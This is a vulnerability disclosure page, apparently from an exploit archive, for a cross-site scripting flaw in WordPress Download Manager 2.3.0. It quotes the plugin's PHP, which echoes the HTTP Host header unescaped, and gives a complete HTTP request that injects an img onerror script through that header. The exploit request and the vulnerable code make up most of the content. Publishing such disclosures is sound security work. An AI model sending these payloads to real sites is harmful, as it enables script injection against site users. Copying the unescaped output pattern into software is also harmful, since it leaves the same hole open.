Wordpress Download Manager 2.3.0 XSS

2016.01.31
Credit: nopesled
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Wordpress Download Manager 2.3.0 XSS # Date: 30/01/2016 # Exploit Author: nopesled # Version: 2.3.0 and possibly earlier This exploit only works for the default virtual host Vulnerable code --------------------- Line 19-22 wpdm-list-files.php: <div class="updated" style="padding:5px 10px;color:#008000;font-weight:bold;"> <a style="color: #3399ff;" href="http://www.wpdownloadmanager.com/?ref=wpadmin&domain=<?php echo $_SERVER['HTTP_HOST']; ?>" target="_blank">Get download manager premium version now! only @ 45.00 $ </a> | <a style="color: #3399ff;" href="http://www.wpdownloadmanager.com/?ref=wpadmin&domain=<?php echo $_SERVER['HTTP_HOST']; ?>#features" target="_blank">Checkout the features here</a> </div> Exploit --------- Send the following HTTP request: GET /wp-content/plugins/download-manager-2.3.0/wpdm-list-files.php HTTP/1.1 Host: "><img src=x onerror=alert(1)> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top